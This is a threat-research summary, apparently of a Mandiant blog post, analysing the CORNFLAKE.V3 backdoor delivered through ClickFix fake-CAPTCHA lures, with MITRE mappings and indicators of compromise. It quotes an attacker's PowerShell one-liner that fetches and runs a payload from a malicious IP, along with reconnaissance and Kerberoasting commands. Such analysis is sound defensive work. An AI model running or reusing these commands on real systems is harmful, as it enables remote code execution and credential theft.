Threat Research

A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor | Google Cloud Blog

GoogleCloudIntel
A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor | Google Cloud Blog

Mandiant observed UNC5518 using compromised websites and ClickFix fake CAPTCHA lures to trick users into executing PowerShell droppers that install CORNFLAKE.V3, which UNC5774 uses as a backdoor to retrieve and execute additional payloads. The CORNFLAKE.V3 family (Node.js and PHP variants) supports multiple payload types, persistence via Run registry keys, Active Directory reconnaissance, and credential harvesting (Kerberoasting). #UNC5518 #UNC5774 #CORNFLAKE.V3

Keypoints

  • UNC5518 compromises legitimate websites and deploys fake CAPTCHA (ClickFix) pages that copy malicious PowerShell/JS to the clipboard, leading to user execution via Windows+R.
  • UNC5774 leverages access provided by UNC5518 to deploy the CORNFLAKE.V3 backdoor (Node.js and PHP variants) that communicates with C2 over HTTP and supports EXE, DLL, JS, CMD and other payload types.
  • CORNFLAKE.V3 implements persistence via HKCUSoftwareMicrosoftWindowsCurrentVersionRun (ChromeUpdater or randomized Run key), and can abuse Cloudflare tunnels for proxying traffic.
  • The infection chain uses droppers that download Node.js or PHP runtimes, base64-decode an embedded CORNFLAKE.V3 payload, and execute it via node.exe -e or php.exe with covert arguments.
  • Observed post-compromise activity includes host and Active Directory reconnaissance, Kerberoasting credential harvesting, and deployment of secondary implants such as WINDYTWIST.SEA.
  • The PHP variant changes file extensions (e.g., .png/.jpg) for DLL/JS payloads, adds ACTIVE/AUTORUN commands, and uses dynamically generated C2 paths to evade detection.
  • Mandiant and Google SecOps provide hunting queries and detection rules to identify PowerShell launching node.exe/php.exe from %AppData%, suspicious clipboard interactions, and related network connections.

MITRE Techniques

  • [T1059 ] Command and Scripting Interpreter – CORNFLAKE.V3 and droppers use PowerShell and Node.js/php to execute commands and scripts: ‘powershell -w h -c “$u=[int64]…;irm 138.199.161[.]141:8080/$u|iex”‘ and node.exe/php.exe execution of decoded payloads.
  • [T1204 ] User Execution – ClickFix fake CAPTCHA lures cause users to paste/copy a script into the Run dialog, resulting in execution: ‘the user was lured into pasting a hidden script into the Windows Run dialog box which was automatically copied to the clipboard’.
  • [T1574 ] Hijack Execution Flow – CORNFLAKE.V3 establishes persistence by creating Run registry keys (ChromeUpdater or randomized names) to execute node.exe/php.exe at logon: ‘creates a new registry Run key named ChromeUpdater under HKCUSoftwareMicrosoftWindowsCurrentVersionRun’.
  • [T1105 ] Ingress Tool Transfer – Droppers download Node.js or PHP runtimes and additional payloads from remote servers (nodejs[.]org, windows.php[.]net, 138.199.161[.]141): ‘download Node.js via HTTPS from the URL hxxps://nodejs[.]org/dist/… and extract…’.
  • [T1016 ] System Network Configuration Discovery – CORNFLAKE.V3 collects ARP and network-related info via commands like ‘arp -a’ as part of system information collection: ‘systeminfo ; … ; arp -a’.
  • [T1082 ] System Information Discovery – Malware gathers systeminfo, tasklist/services, drives and privilege level to report to C2: ‘gathers the script’s version, user privilege level … systeminfo ; tasklist /svc ; Get-Service’.
  • [T1113 ] Screen Capture (related to clipboard abuse) – Adversary uses clipboard manipulation to transfer malicious command text into user’s Run dialog: ‘the script is copied to the clipboard by the malicious web page when the user clicked on the image’.
  • [T1003 ] OS Credential Dumping (Kerberoasting) – Actors perform Kerberoasting to harvest service account ticket hashes for offline cracking: ‘attempts to harvest credentials via Kerberoasting… requests a Kerberos service ticket from which a password hash is extracted’.
  • [T1046 ] Network Service Discovery – Recon scripts enumerate domain controllers, trusts, and SPNs using nltest, setspn and AD queries: ‘nltest /dclist … setspn -T -Q */*’.
  • [T1071 ] Application Layer Protocol – CORNFLAKE.V3 communicates with C2 via HTTP POST/GET and can use Cloudflare Tunnels for proxied traffic: ‘sends an initial POST request to the path /init1234… has also been observed abusing Cloudflare Tunnels to proxy traffic’.
  • [T1106 ] Native API – Use of rundll32.exe to execute downloaded DLL payloads (WINDYTWIST.SEA) as part of payload execution: ‘the received payload is written … and launched using rundll32.exe’.

Indicators of Compromise

  • [IP Address ] UNC5518 distribution and C2 – 138.199.161[.]141 (dropper host), 159.69.3[.]151 (CORNFLAKE.V3 Node.js C2)
  • [Domain ] PHP/ClickFix infrastructure – varying-rentals-calgary-predict.trycloudflare[.]com (PHP C2), dnsmicrosoftds-data[.]com and windows-msg-as[.]live (UNC5518 delivery domains)
  • [File Hash ] CORNFLAKE and related samples – 905373a0…6c236 (downloaded.zip SHA256 containing Node.js), 000b24076cae8dbb…071ac5b (node log CORNFLAKE.V3 sample), a2d4e8c3094c959e…a2d1 (php config.cfg CORNFLAKE.V3), and 14f9fbbf7e82…268b0c (WINDYTWIST.SEA DLL)
  • [File Path / Name ] Persistence and dropped files – %APPDATA%node-v22.11.0-win-x64node.exe executed with -e, HKCUSoftwareMicrosoftWindowsCurrentVersionRunChromeUpdater, %APPDATA%phpconfig.cfg (PHP variant), C:UsersAppDataRoamingShift19434078G0ZrQi.png (WINDYTWIST.SEA)
  • [Registry ] Persistence keys – HKCUSoftwareMicrosoftWindowsCurrentVersionRunChromeUpdater and randomized Run key names in %APPDATA% for PHP variant

Read more: https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflake-v3-backdoor

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint